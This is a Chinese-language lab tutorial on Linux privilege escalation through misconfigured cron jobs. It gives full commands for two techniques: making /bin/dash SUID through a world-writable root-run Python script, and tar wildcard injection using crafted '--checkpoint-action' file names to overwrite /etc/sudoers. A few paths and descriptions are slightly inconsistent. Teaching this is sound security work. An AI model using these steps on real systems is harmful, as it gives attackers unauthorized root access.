在本文中,我们将学习“通过利用Cron jobs实现特权升级”,以获得远程主机的root访问权限,并研究一个糟糕的Cron Job实施如何导致特权升级。
什么是Cronjob?
Cron Jobs被用于通过在服务器上的特定日期和时间执行命令来安排任务。它们最常用于sysadmin任务,如备份或清理/tmp/目录等。Cron这个词来自crontab,它存在于/etc目录中。 
例如:在crontab内部,我们可以添加以下条目,以每1小时自动打印一次apache错误日志。
|
1
|
1 0 * * * printf “” > /var/log/apache/error_log
|
Crontab文件覆写
创建一个Cron Job
目标:在crontab的帮助下安排一个新任务,运行一个python脚本,它将删除特定目录中的所有数据。
假设“cleanup”就是每2分钟自动删除一次数据的目录。因此,我在/home/cleanup中保存了一些数据。
|
1
2
3
4
5
6
7
|
mkdir cleanup
cd cleanup
echo “hello freinds” > 1.txt
echo “ALL files will be deleted in 2 mints” > 2.txt
echo “” > 1.php
echo “” > 2.php
ls
|
正如你可以从下图中看到的那样,一些文件存储在cleanup目录中。 
现在,在任何其他目录中编写一个python程序,从/home/cleanup中删除数据,并授予其所有权限。
|
1
2
|
cd /tmp
nano cleanup.py
|
|
1
2
3
4
5
6
7
|
#!/usr/bin/env python
import os
import sys
try:
os.system(‘rm -r /home/cleanup/* ‘)
except:
sys.exit()
|
chmod 777 cleanup.py 
最后,在crontab的帮助下安排一项任务,每2分钟运行一次cleanup.py。
|
1
2
|
nano /etc/crontab
*/2 * * * * root /tmp /cleanup.py
|
现在,我们来验证一下目标。
|
1
2
3
4
|
cd /home/cleanup
ls
date
ls
|
很好,它正在运行,你可以看到所有文件在2分钟后被删除。 
实施漏洞利用
启动攻击机器,首先破坏目标系统,然后进入特权提升阶段。假设我通过ssh成功登录到受害者的机器,并访问非root用户终端。执行以下命令,如下所示。
|
1
2
3
|
cat /etc/crontab
ls –al /tmp/cleanup.py
cat /tmp/cleanup.py
|
从上面的步骤中,我们注意到crontab每2分钟运行一次python脚本。 
有很多方法可以获得root访问权限,就像在这个方法中我们启用了SUID位/bin/dash。这很简单,首先,通过一些编辑器打开文件。例如,nanocleanup.py。并从下面的行中替换“rm -r /tmp/*”,如下所示。
|
1
|
os.system(‘chmod u+s /bin/dash’)
|
两分钟后,它将为/bin/dash设置SUID权限。当你运行它时,它将给予root访问权限。
|
1
2
3
|
/bin/dash
id
whoami
|
太棒了!!我们…………………完成了目标。
Crontab Tar Wildcard注入
创建一个Cron Job
目标:在crontab的帮助下安排一个任务,用HTML目录下的tar存档程序进行备份。
这个目录应该具有你想要进行备份的可执行权限。 
现在,在crontab的帮助下安排一个任务,运行tar档案程序,以每1分钟备份一次/html文件夹到/var/backups。
|
1
2
|
nano /etc/crontab
*/1 * * * * root tar –zcf /var/backups/html.tgz /var/www/html/*
|
让我们执行以下命令来验证计划是否有效。
|
1
2
3
|
cd /var/backup
ls
date
|
从下图你可以看到,html.tgz文件在1分钟后生成。
实施漏洞利用
启动攻击机器,首先破坏目标系统,然后进入特权提升阶段。假设我通过ssh成功登录到受害者的机器,并访问非root用户终端。执行以下命令,如下所示。
cat / etc / crontab
在这里,我们注意到目标已经为每一个1分钟安排了一个tar归档程序,并且我们知道cron job作为root运行。让我们试着利用。 
执行以下命令将sudo权限授予登录的用户,随后进行wildcard注入。
|
1
2
3
4
|
echo ‘echo “ignite ALL=(root) NOPASSWD: ALL” > /etc/sudoers’ >test.sh
echo “” > “–checkpoint-action=exec=sh test.sh”
echo “” > —checkpoint=1
tar cf archive.tar *
|
现在,1分钟以后,它将向用户授予sudo权限。你可以通过下图来确认这一点。
|
1
2
3
|
sudo –l
sudo bash
whoami
|
很好!我们已经成功地获得了root访问权限。
审核人:yiwang 编辑:边边
发表评论
您还未登录,请先登录。
登录